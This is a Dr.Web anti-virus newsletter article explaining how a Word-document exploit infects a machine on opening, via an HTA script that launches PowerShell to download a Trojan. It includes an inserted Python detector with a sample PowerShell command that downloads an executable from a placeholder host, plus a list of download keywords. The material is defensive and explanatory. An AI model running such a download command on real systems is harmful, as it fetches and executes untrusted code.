Don't even open
Wednesday, July 5, 2017
And I've got this question (it may seem naive) and I wanted to ask it for quite a while but issues about this topic wouldn't come up. Maybe it's a myth that I invented myself but to avoid infection I never open emails in my mailbox as well as short messages if the message or SMS appears suspicious to me (I check the subject line and a few words at the very beginning of a message which I can read without opening it). I mean that I not only refrain from doing foolish things (reply to messages, try to unsubscribe or open links or attached files), but I merely delete these emails/SMS without opening. And my question is this: can opening an email/SMS cause any problems if I do not take any of the actions I've described above (in brackets)? I tend to think that if I just open an email/SMS, nothing bad should happen. But everything is possible.
Collective consciousness can work wonders. The threat the user is talking about indeed exists or, to be more precise, it existed at the moment when the question was asked. Those who remember mass mailings in the era of "I love you" know that, thanks to vulnerabilities, malicious actions could sometimes be carried out even without opening an email: receiving it by a mail client was enough. That's why Dr.Web features the HTTP monitor SpIDer Gate™ as well as the SpIDer Mail monitor to scan traffic before it is processed by a receiving application in a protected system.
We assumed that threats of this kind ceased to exist and intended to talk about it in a history column of our project. But suddenly just a few days later…
This vulnerability was detected in Microsoft Word. Cybercriminals have developed an active exploit for this application in the form of a Microsoft Word document. Once this document is opened, another file called doc.doc is loaded. It contains an embedded HTA script, detected by Dr.Web as PowerShell.DownLoader.72. This HTA script, written using Windows Script syntax, calls the command interpreter PowerShell. PowerShell processes another malicious script that downloads an executable file to the attacked computer.
Currently, cybercriminals use this mechanism to install Trojan.DownLoader24.49614 on the computers of their victims. This Trojan downloads and runs other malicious software on infected machines.
It means that to get a machine infected, one only needs to try opening the document: the system will have been compromised before you see the contents.
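The step where the HTA script calls PowerShell leaves a trace in process-creation telemetry that a defender can look for. The following is an added example, not Dr.Web's code: it flags PowerShell processes whose parent is mshta.exe, the Windows program that runs HTA scripts. The record key names and all sample events are constructed for illustration.

```python
from ntpath import basename  # parses Windows paths on any OS

HTA_HOSTS = {"mshta.exe"}    # Windows program that runs .hta scripts
SHELLS = {"powershell.exe"}
# Substrings that suggest the shell was asked to fetch a file.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "start-bitstransfer")

# Constructed process-creation records (not taken from the article).
# Key names are assumptions; map them from your own telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 2040, "ppid": 900,
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r"WINWORD.EXE C:\Users\u\Downloads\invoice.doc"},
    {"pid": 3004, "ppid": 640,
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe"},
    {"pid": 3120, "ppid": 3004, "image": PS,
     "cmdline": "powershell.exe -Command (New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/x.exe','x.exe')"},
    # Benign: someone fetching a file from an interactive shell.
    {"pid": 4100, "ppid": 900, "image": PS,
     "cmdline": "powershell.exe Invoke-WebRequest https://example.invalid/t.zip"},
]

def name(path):
    return basename(path).lower()

def find_hta_shell_chains(events):
    """Return one finding per shell process whose parent is an HTA host."""
    by_pid = {e["pid"]: e for e in events}  # assumes no PID reuse in the window
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if name(e["image"]) not in SHELLS or parent is None:
            continue
        if name(parent["image"]) not in HTA_HOSTS:
            continue
        cmd = e["cmdline"].lower()
        findings.append({
            "shell_pid": e["pid"],
            "hta_pid": parent["pid"],
            "fetches_file": any(h in cmd for h in DOWNLOAD_HINTS),
        })
    return findings

if __name__ == "__main__":
    for finding in find_hta_shell_chains(SAMPLE_EVENTS):
        print(finding)
```

Only the PowerShell process started by mshta.exe is reported; the interactive download with a different parent is not, which keeps the rule tied to the parent-child relationship rather than to the command line alone.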
#vulnerability #exploit #email
The Anti-virus Times recommends
- Believing that a system will never get infected because you see what you are doing is dangerous. The exploit we described above will do its job while you won't notice anything.
- An anti-virus doesn't incorporate useless modules. Dr.Web SpIDer Gate is responsible for scanning traffic and will prevent threats of this kind from being saved in a system.
- Infection techniques similar to those described above don't fall out of use completely. Depending on availability of loopholes in a system, they may become more or less relevant. But believing that there will be no vulnerabilities and continuing to use a product that was developed without any consideration for such risks is to take the matter lightly.
And the vigilant user surely gets a well-deserved award ☺